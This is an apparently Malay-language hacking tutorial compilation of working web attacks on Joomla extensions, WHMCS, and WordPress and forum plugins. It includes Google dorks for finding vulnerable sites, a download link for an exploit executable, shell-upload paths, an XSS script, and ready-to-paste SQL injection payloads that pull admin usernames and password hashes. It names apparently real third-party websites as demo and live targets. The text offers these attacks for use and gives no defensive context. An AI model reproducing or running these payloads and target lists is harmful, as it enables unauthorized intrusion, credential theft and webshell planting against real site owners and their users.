Com_Jce Shell Upload

JCE Exploit 2 

Download Dulu : http://xx.pa-rc.org/x86/JCE.exe
Dorknya :
inurl:”/index.php?option=com_jce”
inurl:index.php?option=com_virtuemart

Contoh:

Kemudian cari target http://www.kazan.monarh.su/

Jika Dork Berhasil maka execution macam gambar  :

http://www.kazan.monarh.su/images/stories/3xp.php

Sekarang  Upload Shell anda…

WHMCompleteSolution SQLI

WHMCS? WHMCS ni adalah WHMCompleteSolution dimana selalunya webapps ni digunakan untuk laman jual beli seperti laman web hosting dan domain.
Ok jom!

1. Mula-mula cari website vuln dengan dork :

- intext:"Powered by WHMCompleteSolution"

- inurl:"submitticket.php‎"‎

- inurl:dl.php?type=

2. Lepas dah dapat satu website masa untuk inject.Contoh aku dapat laman web ni :

http://www.powermailings.com/billing/dl.php?type=d&id=1

String untuk kita inject :

and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --

Sekarang tambah string tu di hujung nombor id url website tu.contoh :

http://www.powermailings.com/billing/dl.php?type=d&id=1 and 0x0=0x1 union select 1,2,3,4,CONCAT(username,0x3a3a3a,password),6,7 from tbladmins --

Lepas tu Enter!
Bila kita inject ni, kalau berjaya browser kita akan download satu file format .pdf .dalam file ni adalah Username dan Password WHMCS tu :D

3. Untuk login :
http://www.target.com/path/admin

contoh :
http://www.powermailings.com/billing/admin
Ok itu saja untuk tutorial kali ni.enjoy...

Wordpress zingiri-forum Plugin SQL Injection

# Exploit Title : Wordpress zingiri-forum Plugin SQL Injection Vulnerability

# Security Risk : Medium

# Google Dork : inurl:/wp-content/plugins/zingiri-forum/mybb/showthread.php?tid=

# Location:site/[path]/wp-content/plugins/zingiri-forum/mybb/showthread.php?tid=[SQLi]

#Demo site  :

http://www.glXa.com/wp-content/plugins/zingiri-forum/mybb/showthread.php?tid=64537%27
http://sscXg.com/wp-content/plugins/zingiri-forum/mybb/showthread.php?tid=104%27

KBoard 3.3 SQLi/XSS

Exploit Title: WordPress plugins KBoard SQLi/XSS Vulnerabilities

# Vendor Homepage: http://www.cosmosfarm.com/products/kboard
# Download link: http://www.cosmosfarm.com/wpstore/kboard/download-kboard?version=3.3
# Category: webapps/php
# Version: 3.3
# Google dork: inurl:wp-content/plugins/kboard/board.php
---------------------------------------------------

[#] [XSS]
Vulnerable Parameters: pageid, search, keyword
-exploit-
http://[host]/wp-content/plugins/kboard/board.php?board_id=1&pageid=1&mod=list&search=&keyword=[xss]
-demo-
http://www.chahongardor.com/wp-content/plugins/kboard/board.php?board_id=1&pageid=1&mod=list&search&keyword=%22%27%3E%3CScRiPT%3Ealert%28%2FXSS%2F%29%3C%2FScRiPT%3E

[#] [SQL Injection]
-exploit-
http://[host]/wp-content/plugins/kboard/board.php?board_id=2&mod=document&uid=[SQL_Injection]
-demo-
http://www.chahongardor.com/wp-content/plugins/kboard/board.php?board_id=2&mod=document&uid=999+union+select+group_concat%28user_login%2C0x3a%2Cuser_pass%29%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18+from+wp_users
note: the result in page source
more sites in G00GLE

D-Forum 1.11

D-Forum 1.11 SQL Injection Vulnerability

EXPLOIT :

http://localhost/[path]/nav.php3?page=voirsujet&boardid=1&postid=[SQLi]



DORK:

"Powered by D-forum"
"nav.php3?page=voirsujet"



Live Target :

http://va.teamdh.free.fr/dforum/nav.php3?page=voirsujet&boardid=1&postid=1
-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--



POC :

-null+union+select+1,2,3,group_concat(0x3a,user_login,0x3a,user_pass,0x3a),5,6,7,8,9,10,11,12,13+from+dforum_users--

Com_Fabrik Shell Upload

# Google Dork :
inurl:index.php?option=com_fabrik
or index.php?option=com_fabrik

# Vulnerable path :
http://[target]/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

View Shell or Page-->
http://[target]/media/shell.php